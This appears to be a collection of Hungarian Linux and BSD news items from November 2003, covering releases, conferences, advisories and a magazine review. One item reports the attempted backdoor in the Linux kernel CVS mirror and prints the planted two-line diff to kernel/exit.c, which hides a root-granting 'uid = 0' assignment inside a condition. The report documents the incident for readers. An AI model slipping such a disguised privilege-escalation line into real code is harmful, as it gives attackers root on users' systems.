Rick Wash jelenleg azon dolgozik, hogy eszközmeghajtót írjon a TCPA chip-hez NetBSD-re. Jelenlegi állapotban a saját laptop-ján (IBM T30 laptop) működik a driver NetBSD alatt. Akinek van olyan IBM laptop-ja, amelyben szintén van "IBM Security Subsystem", az kipróbálhatja, hogy neki működik-e a meghajtóprogram.

Mi az a TCPA? Korábbi cikkünk:

Orwelli jővőkép még az idén?

Magyar nyelvű TCPA áttekintés

Rick levele itt.

2003. november 21–23-án az FSF.hu Alapítvány ismét fordítóhétvégét szervez. A hagyományoknak megfelelően egy webes fordítófelületen lehet akár otthonról, akár a buli helyszínén segíteni.

Tegnap este 6 órával lezárult a GNU/Linux szakmai konferencia 2003. Az előadók közül Kadlecsik József nyerte a különdíjat, egy ASUS notebookot.A különdíjat az az előadó érdemelte ki akinek az előadására a legtöbben szavaztak. Kadlecsik Józsi előadása a Linux alapú tűzfalakról szólt Gbit-es környezetben. Az öreg kernel hacker jól összeállított ábrákkal és megoldásokkal érzékeltette azokat a problémákat amelyekbe belebotlottak a iptables tesztelése során.

Kisebb változás is történt az eredeti programtervezet helyett, mert Verók István FSRv2Fordítást Segítő Rendszer (v2) előadása elmaradt.

Ennek ellenére a konferencia remekül megrendezett és jól összeállított műsorsorozat volt, amelyből nem hiányzott a jókedv és a szakértelem.

Az előadások hanganyaga remélhetőleg hamarosan elérhető lesz az oldalon.

Egy elég pesszimista és meglepő, de végeredményben igaz
cikk jelent meg a prog.hu-n (ITT) illetve az index.hu-n:

Kb. azt taglalja, hogy a linux lassan megszűnik ingyenesnek lenni, elsősorban a Red Hat desktop megszűnés, a SuSE-Novell felvásárlás és az SCO perre alapozva. Érdekes...

A'rpi

Megjelent a Mandrake Linux 9.2 AMD64 platformra szánt verziójának első kiadásra jelölt verziója. A változások logja és a letöltési infók itt.

Megjelent a Dæmon News Ezine ehavi száma. A BSD világával foglalkozó hírlevelet megtalálod itt.

Valamerre elkóborolt a postás, mert csak ma kaptam meg a Linuxvilág novemberi számát. Lehet, hogy titokban Linux addict, és lefénymásolta az újságot :-) ? Lássuk mit állítottak össze az LV-s fiúk ebben a hónapban:

Az újság elején egy kommandós és egy helikopter alakja vehető ki, talán éjjellátó készüléken keresztül. Azt hiszem ebben a hónapban a katonaság és a Linux kapcsolata lesz az egyik fő irányvonal a lapban.

A korong:

-----------

A CD ``Jatek'' könyvtárában elsőként egy T3 könyvtár tűnik szembe. A könyvtárban annak a magyar fejlesztésű ``Terminator 3: War of the Machines'' programnak az előzetes képei és rövid trailer-e kapott helyet, amelyet az a cég fejleszt, amely korábban a Screamer 4x4 programot jegyezte. A program várhatóan ebben a hónapban jelenik meg, és az ATARI dobja piacra. Linuxos kliens nem lesz a fejlesztők szerint, ezért nem nagyon értem miért is került bele a magazinba. De talán majd wine(x)-szel :-)

A ``Jatek'' könyvtárban megtalálhatjuk még a népszerű NeverWinter Nights játékhoz készült patcheket, és a Shogo névre hallgató játék képeit és demoját.

A ``KDE'' könyvtárban a KDE 3.1 desktop környezet Red Hat 9-es .rpm csomagjait találjuk meg.

A ``Magazin'' könytárban a cikkekhez tartozó anyagokat, forráskódokat, stb. találjuk.

Az ``OpenOffice.org'' könyvtár az OOo 1.1.0-ás változatát rejti.

A ``Rendszermag''-ban a Linux 2.6.0-test7 forráskódja került.

A ``SE_Linux''-ban pedig a Security Enhanced Linux 2.4.21-es kernelforráshoz való patchét, és az újságban leírtak kipróbálásához szükséges anyagokat leljük.

A lap:

------

• Az SCO-s botrány kronológiája - Csontos Gyula cikke a lassan 8 hónapja folyó SCO kontra IBM + Linux közösség + SGI ügyről. Dátum szerint összeszedve azon események, amelyek a Caldera névváltásától kezdve a SCO az SGI ellen intézett akciójáig tartanak.
• RSTA-MEP és a Linux-munkaállomás - a cikk egy olyan katonai eszközről szól, amely önműködően észleli az ellenséget a sötétben, és értesíti a saját erőket. Az eszköz egy katonai Hummer terepjáróra épített berendezés, amelynek a lelke Linux.
  
• Egy nemzet programok nélkül: Linuxot Iraknak! - a cikk arról szól, hogy az elszigetelt Irak - ahol egy korrupt diktatúra irányította az országot - lemaradt az évek során a programok használatában. Ebben az országban a Linux tiszta lappal indulhat. Már szerveződik az új iraki Linux-felhasználói csoport. Honlapjuk a linux-iraq.org.
  
• Hitelesítés LDAP használatával (3. rész) - folytatódik Mick Bauer cikksorozata, melynek célja, hogy olyan LDAP kiszolgálót hozzunk létre, amely valódi felhasználókat tud hitelesíteni valóságos környezetben. A cikksorozat befejező része olvasható ebben a hónapban.
  
• NSA fokozott biztonságú Linux - a cikk az NSA Security Enhanced Linux-ról, a Mandatory Access Control-ról és az olyan finomhangolt biztonsággal rendelkező rendszerekről szól, ahol még azt is korlátozni tudjuk, hogy a rendszergazda mit tehet
  
• Héjprogramozás Linux alatt - Büki András rovata, amelyben a Linuxszal ismerkedők találhatnak fontos információkat a shellprogramozás alapjairól
  
• Az XML és Perl - a Perl-lel ismerkedők kaphatnak hasznos infókat az XML és és Perl kapcsolatáról
  
• Tükröm, tükröm - Marcel Gagné ehavi cikkében azzal ismerkedhetünk meg, hogy hogyan tartsuk naprakész állapotban web és ftp oldalunkat. wget, scp, mirdir, ftpcopy, stb. programok használatának ismeretése

A Játék rovatban a Shogo névre hallgató, LithTech engine-re épülő FPS játék ismertetőjét olvashatjuk el (demo a korongon). Emellett a T3: War of the Machines készítőivel olvashatunk egy interjút a rovatban.

Jó olvasást!

A lapszemléhez használt Linuxvilág számot a Kiskapu Kft. biztosította számomra. Köszönet érte.

A Linux-felhasználók Magyarországi Egyesülete 2003. november 8-án (szombaton), azaz holnap rendezi meg az V. GNU/Linux szakmai Konferenciát.



A Konferencia fő témája a honosítás és a magyar fejlesztések.A Konferencia reggel 10:00 órakor kezdődik és 18:00 óráig tart.



A konferencia helyszíne:
Hotel Novotel Budapest Centrum

Budapest, VIII. Rákóczi út 43-45.



Megközelíthető a "piros 2-es metró" Blaha Lujza téri megállójától gyalog kb. 2 perc alatt. A Keleti pályaudvartól gyalog kb. 15 perc alatt.



A konferencia honlapja itt.



A kérdés, hányan lesznek ott a HUP olvasói közül?

(a cikkhez kapcsolódik szavazás. lásd jobb oldalt)

Október közepén írtam arról, hogy az OpenBSD olyan funkciókkal bővült, amely magas rendelkezésre-állás (high availability) és terhelés-elosztás (load balancing) képességekkel ruházza fel az operációs rendszert.

Ezen funkciók közül az egyik a CARP (Common Address Redundancy Protocol). A CARP segítségével lehetőség nyílik arra, hogy az OpenBSD rendszerünket kiskálázzuk. Hasznos, mert az OpenBSD-t felfele skálázni nagyon nem lehet, hiszen nem támogat SMP-t (több processzort).

megjegyzés:

(kiskálázás (scale out) - amikor a rendszerre irányuló kéréseket úgy próbáljuk kiszolgálni, hogy nem nagyobb vasat teszünk a rendszerbe (big iron teória), hanem több kisebb (akár blade) szerverrel oldjuk meg a problémát, úgy hogy közöttük elosztjuk a terhelést. - felskálázás (scale up) - amikor a terhelést úgy próbáljuk meg kiszolgálni, hogy egyre nagyobb vasat használunk fel, több CPU-t, merevlemezet, memóriát, stb. zsúfolunk ugyanazon gépbe (a scale up eljárás a mai felfogás szerint idejét múltabb, mint a scale out)

Úgy tűnik, hogy a FreeBSD felhasználóknak is lehetőségük nyílik a CARP használatára.Max Laier küldött egy levelet a current@ listára, amelyben arról értesít, hogy az OpenBSD-s, 2-kikötéses BSD licenc alatt elérhető CARP implementációt portolta a FreeBSD-CURRENT-hez.

A FreeBSD-s CARP patchset elérhető a pf4freebsd.love2party.net/carp.html címen.

Max levele itt.

Csomag: postgresql

Sebezhetőség: puffer túlcsordulás

Probléma típus: távoli

Debian-specifikus: nem

CVE Id: CAN-2003-0901

Bugtraq ID: 8741Tom Lane talált egy puffer túlcsorulási hibát a PostgreSQL to_ascii függvében. Ez lehetővé teszi távoli támadók számára, hogy tetszőleges bináris kódot végrehajtsanak az adatbázist futtató gépen.


Az aktuális stabil terjesztésben (woody) a 7.2.1-2woody4 verziójú csomag javítja a hibát.

Az instabil terjesztés (sid) nem tartalmazza a problémát.


A postgresql csomag frissítését javasoljuk.


Martin Schultze levele a debian-security-announce listán.

A frissítésről szóló FAQ-nk.

Corey Holcomb-Hockin egy rövidebb áttekintést készített a nemrég megjelent FreeBSD 4.9 operációs rendszer telepítéséről, alapvető beállításáról, jobban desktop felhasználó szemszögéből.

Megjelent a készülő UHU-Linux 1.1 negyedik tesztelésre szánt kiadása, letölthető az ftp.uhulinux.hu/pub/uhu/1.1-beta4/ címről.Főbb újdonságok az 1.1-beta3 óta:

- Rengeteg szoftverfrissítés. A fontosabbak:

- Mozilla 1.5

- OpenOffice.org 1.1.0 (fsf.hu változat)

- gcc 3.3.2

- újabb Gnome komponensek 2.4.1-es verziója

- Tömérdek sok apró hibajavítás.

- Javítottuk a perl-gtk csomag hibáját, amely miatt több alkalmazás (például dvdrip) nem indult el.

- Pótoltuk a python csomagból hiányzó tkinter támogatást.

- Frissítettük a pcmcia-cs csomagot. Mostantól alapértelmezésben nem indul el a szolgáltatás. Ha indítását engedélyezzük a vezérlőpultban, akkor a korábbival ellentétben nem utolsók között, hanem elsők között indul a boot folyamán.

- Gnome-terminálban mc-t futtatva bizonyos billentyűk eddig nem működtek jól, ezt javítottuk.

- Új, szebb és nagyobb tudású fájlválasztó ablak a gtk2 alkalmazásokban.

- Az UHU alapértelmezésben mostantól elvégzi a CMOS óra nyári és téli időszámítás közötti átállítását.

- A KDE alkalmazások immár elérhetők minden ablakkezelő menüjében. A rendszerezés még nem tökéletes, még finomítunk rajta.

- Kijavítottuk a boot-floppy készítésének hibáját.

- Kernel és környéke:

- Rengeteg hibajavítás és frissítés, ezek közül a legfontosabb az ACPI.

- Bekerült a saa7134 chippel rendelkező tvtuner kártyák támogatása.

- ALSA 0.9.8 frissítés, amely több hangkezelessél kapcsolatos problémát megold.

- davfs támogatás

- IMQ (Intermediate queueing device) főleg az ADSL kapcsolatok jobb kihasználhatóságának érdekében.

- A "7x jelenik meg a cdrom" probléma javítva.

- Néhány fölösleges, zavaró kernel üzenet elrejtve.

- Modulok betöltésének letilthatósága.

- A telepítő ismét működik 1G vagy több rammal rendelkező gépeken.

- Az emu10k1 chippel rendelkező Sound Blaster hangkártyákhoz szállítjuk az emu10k1 modult is, amellyel jobban kihasználható a 4 ill. 6 csatorna.

- Ismét betöltődik automatikusan a serial modul, illetve az ACPI kihasználásához szükséges modulok.

A béta kiadást tesztelésre szánjuk. Mindenféle hibajelentést szívesen fogadunk a dev@uhulinux.hu fejlesztői listánkra, viszont nem tudjuk garantálni, hogy bármiféle kérdésben segíteni fogunk, így aki stabil rendszert kíván használni, annak azt ajánljuk, várja meg a végleges
1.1-et. Az 1.1-beta4 kiadásban súlyos hibáról nem tudunk, viszont bőven vannak még apró javítanivalók.

A Linux From Scratch közösség bejelentette a LFS-5.0-át. Ez a nagyobb mérföldkőnek számító kiadás olyan újdonságokat tartalmaz, mint például a Linux kernel 2.4.22, a GNU C (glibc) 2.3.2 könyvtár, a GNU Compiler Collection (gcc) 3.3.1, a korábbi LILO helyett a GRUB, stb.A berhelő lelkületű felhasználók minden bizonnyal örömmel fogadják a ``csináld-saját-kezűleg-nulláról'' disztribúciót.

A telepítéshez segítséget ad az online elérhető (kézi)könyv, amelyet megtalálsz az alábbi címen:

www.linuxfromscratch.org

A 3 napos Blender Konferencia múlt vasárnap bezárta kapuit. Az esemény után a Blender srácok kiadták a Blender 2.3-as verzióját.

FIGYELEM: a Blender.org jelenleg kiszolgálási nehézségekkel küzd (Slashdot effektus). A Blender 2.3 release logját megtalálod itt. A letöltéshez lehetőleg a mirrorokat kell használni.

Mirrorok:

USA mirror (ftp)

Australian mirror (http)

Forrás:

USA mirror (ftp)

Australian mirror (http)

A Fedora Project kiadta a Fedora Core 1-et, másnéven a Yarrow-t. A kiadást november 3-ára várták a felhasználók, de egy kicsit megcsúszott.

A release notes itt.

Letöltés:

yarrow-i386-disc1.iso

yarrow-i386-disc2.iso

yarrow-i386-disc3.iso

Bővebben itt.

A Fedora nem támogatott termék a Red Hat Inc., által.

Véget ért a ``Megjelent a FreeBSD 4.9-RELEASE. Mikor frissítesz?'' című szavazás. Az eredményeket meg lehet nézni itt. Másfél hónappal ezelőtt megszűnt a névtelen hozzászólás lehetősége a HUP-on. Azóta többen is kérték, hogy jó lenne, ha visszaállna a anon hozzászólás. Én nem zárkózom el semmitől, ezért az olvasókra bízom a döntést. Kéretik véleményt nyilvánítani itt.

Larry McVoy - a BitMover alapítója, a Bitkeeper atyja - tegnap egy az LKML-re küldött levelében felhívta a fejlesztők figyelmét arra, hogy valaki backdoor kódot próbált becsempészni a fejlesztői kernelfába.

``Valaki közvetlenül módosította a CVS fát a kernel.bkbits.net-en. Dave megnézte a gépet és úgy látszik, hogy valaki megpróbált betörni, és meg is csinálta.''A módosított file a 'kernel/exit.c' file. A támadó közvetlenül a 2.6.0-test fejlesztői kernel CVS mirror szerverén nyúlt bele a fileba. A CVS logba - nyilván hibásan - David S. Miller (davem - a Red Hat kernelfejlesztője) neve került, mint módosító.

revision 1.121

date: 2003/11/04 16:44:19; author: davem; state: Exp; lines: +58 -0

Oops, I worked on the the wrong file, fixed again.

----------------------------

revision 1.120

date: 2003/11/04 16:42:00; author: davem; state: Exp; lines: +0 -58

*** empty log message ***

----------------------------

revision 1.119

date: 2003/11/04 16:22:47; author: davem; state: Exp; lines: +2 -0

*** empty log message ***

----------------------------

revision 1.118

date: 2003/10/27 19:50:03; author: torvalds; state: Exp; lines: +11 -5

Fix ZOMBIE race with self-reaping threads.

exit_notify() used to leave a window open when a thread

died that made the thread visible as a ZOMBIE even though

the thread reaped itself. This closes that window by marking

the thread DEAD within the tasklist_lock.

(Logical change 1.14141)

----------------------------

Közelebbről megvizsgálva a beillesztett két sornyi kódot, a fejlesztőknek egyértelművé vált, hogy valaki backdoor-t szeretett volna tenni a kernelforrásba. A kód úgy volt megírva, hogy a támadó ``root'' jogot kapott volna a szerveren, ha a támadás sikeres.

A CVS fa jelenleg már a normális kódot tartalmazza, így aki CVS-t használ a fejlesztéshez, az megteheti, hogy eltávolítja a kérdéses filet és frissít.

A beillesztett kód a következő:

--- GOOD 2003-11-05 13:46:44.000000000 -0800

+++ BAD 2003-11-05 13:46:53.000000000 -0800

@@ -1111,6 +1111,8 @@

schedule();

goto repeat;

}

+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

+ retval = -EINVAL;

retval = -ECHILD;

end_wait4:

current->state =TASK_RUNNING;

Sokan támadták (köztük RMS is) annak idején a Bitkeeper-t, mondván, hogy kereskedelmi termékkel fejlesztenek egy nyílt forrású, szabad operációs rendszert. Linus ismert CVS ellenességéről. Ennek ellenére március közepe óta a 2.4 és 2.5 kernelforrások CVS-ben elérhetőek (korai Bitkeeper - CVS gateway már korábban is volt). Jelenleg úgy tűnik, hogy a CVS szervert támadták, a Bitkeeper-t nem. Linus szerint a Bitkeepert biztonságosabb, így ha valahol módosítás történt, akkor az a CVS volt.

A Bitkeeper pártolók hangja most biztos felerősödik. A thread itt.

Az OpenBSD 3.3 és 3.4 rendszereken lehetősége van a lokális felhasználóknak arra, hogy érvénytelen fejléccel rendelkező speciális binárist futtatva rendszer pánikot okozzanak.

Andrew Morton - a 2.6-os kernel karbantartója - ma kiadta a második -mm patchet a 2.6.0-test9 kernelhez. A patch random javításokat tartalmaz. Egy kis tuning a Nick Piggin féle anticipatory IO ütemezőhöz (a 2.6 jelenlegi alapértelmezett elevatora, amellyel voltak kisebb gondok az elmúlt napokban) és némi readahead tuning, amelyek segítségével jobb eredményt lehet elérni az adatbázis tesztekben.

Az anticipatory IO ütemező egyelőre még a deadline IO ütemező (a régi elevator kód) mögött van egy kicsit a teljesítményben a random IO tesztekben (adatbázis műveletek) de reménykedjünk.Az NVIDIA nForce chipset tulajdonosoknak jó hír, hogy az ethernet interface-hez kiadott GPL-es driver már elérhető az -mm2-ben.

Andrew offline lesz pár napig.

Mivel a 2.6.0 kernel fejlesztése a finiséhez érkezett (egyes hírek szerint már akár decemberben lehet stabil 2.6.0-ás kernel), kéretik fokozott intenzitással tesztelni az új kerneleket. A 2.6.0-test sorozat teljesen stabil, május vége óta kizárólag ezt használom az összes gépemen. Nyugodtan lehet (azért fokozott figyelemmel, ugye) tesztelni. Egyesek szerint masszívabb (szerintem is) mint a jelenlegi stabil 2.4 kernelsorozat utolsó tagjai. A bugokat az LKML-re (linux-kernel@vger.kernel.org) kéretik jelenteni.

A stuff letölthető innen.

AKPM levele itt.

A beta5 relative rövid időszaka után a PostgreSQL v7.4 az RC szakaszba lépett. Az első kiadásra jelölt verzió tegnap jelent meg. A végső verzió 7-14 napon belül várható. Az egyetlen nagyobb változás, hogy az RC1 nem működik a továbbiakban a TCL8.0.x verziókkal.

Margarida Sequeira a misc@-ra küldött levele szerint az OpenBSD 3.2-STABLE ág a tegnapi naptól kezdve elérte életciklusa végét, és karbantartás nélkülivé vált. A tegnapi naptól kezdve ehhez a branch-hez már semmilyen javítást és patchet nem készítenek.

Azoknak a felhasználóknak, akik még mindig 3.2-STABLE-t vagy annál régebbi kiadást használnak, erősen javasolják a frissítést, lehetőleg az OpenBSD 3.4-re (amely október 30-án jelent meg).

Margarida levele:Feladó: Margarida Sequeira

Címzett: announce@openbsd.org

Másolat: misc@openbsd.org

Tárgy: OpenBSD 3.2 End Of Life

Dátum: 04 Nov 2003 21:20:56 +0000

Due to the release of OpenBSD 3.4, the 3.2-STABLE branch will be be out of regular maintainance starting today.

There will be NO MORE fixes commited to this branch nor new patches.

People relying on 3.2-STABLE (or older releases even) are strongly advised to upgrade to a more recent release (preferrably 3.4 as it was released on Oct 30th) as soon as possible.

Margarida

Érdekes kijelentéseket tesznek mostanában a Red Hat emberei. Pár napja azt állították, hogy a Unix halott, most pedig a Red Hat vezérigazgatója azt javasolja az otthoni felhasználóknak, hogy használjanak inkább Windows-t (a ZDNet szerint).Matthew Szulik a Red Hat vezérigazgatója azt mondta pár nappal ezelőtt, hogy a Linuxnak még érnie kell ahhoz, hogy az otthoni felhasználók pozitív tapasztalatokat szerezzenek tőle. A CEO szerint addig jobb, ha a home userek Windows-t használnak.

Talán ez érthető is részükről. A Red Hat egyre inkább a vállalati megoldások felé fordul, az otthoni felhasználókat pedig az ugyan általa támogatott, de már nem általa ``gyártott'' Fedora felé tereli. Lehet, hogy a Red Hat teljesen ki akar szállni a desktop bizniszből?

A ZDNet cikke itt.

Release engineering szervereket állítottak csatasorba a NetBSD-sek. A szerverek felhasználhatóak a NetBSD -current és -stable ágak letöléséhez/telepítéséhez. Az automatikus snapshotok statisztikája elérhető a releng.NetBSD.org-on, a telepítést/letöltést FTP-n keresztül lehet elkövetni a releng.NetBSD.org szerveren keresztül.Az autobuild rendszer minden éjjel elkészíti a portokat. Az autobuild rendszer segít a felhasználóknak időszakos snapshotokhoz jutni, és segít a build-elések hibakeresésében.

Bővebben itt.

Megjelent a Debian közösség szokásos heti hírlevelének, a DWN-nek az ez évi 44. száma.

A tartalomból:

A Netfilter Core Team november másodikán kiadta az iptables (a >2.4-es kernel csomagszűrőjének userspace kezelőprogramja) következő stabil verzióját, az 1.2.9-et. Azt írják ez a verzió nagyon sok hibának a javítását tartalmazza, mindenkinek ajánlják a frissítést.Igen bő a változások listája, érdemes böngészgetni. Elérhető a forráskód és a GPG aláírás.